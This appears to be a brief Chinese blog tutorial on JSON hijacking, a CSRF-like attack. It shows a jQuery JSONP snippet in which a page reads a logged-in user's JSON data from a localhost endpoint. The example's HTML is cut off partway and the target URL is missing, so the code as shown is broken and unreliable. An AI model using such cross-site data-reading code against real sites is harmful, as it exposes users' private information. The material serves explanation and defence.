json劫持

json劫持攻击又为”JSON Hijacking”，攻击过程有点类似于csrf，只不过csrf只管发送http请求，但是json-hijack的目的是获取敏感数据。

一些web应用会把一些敏感数据以json的形式返回到前端，如果仅仅通过cookie来判断请求是否合法，那么就可以利用类似csrf的手段，向目标服务器发送请求，以获得敏感数据。

比如下面的链接在已登录的情况下会返回json格式的用户信息：

http:///libs/jquery/1.8.3/jquery.js"></script> </head><body><div id="divCustomers"></div><script type="text/javascript"> $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){ alert(getUsers.name); });</script></body></html>

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持。权声明：本文为博主原创文章，转载请附上博文链接！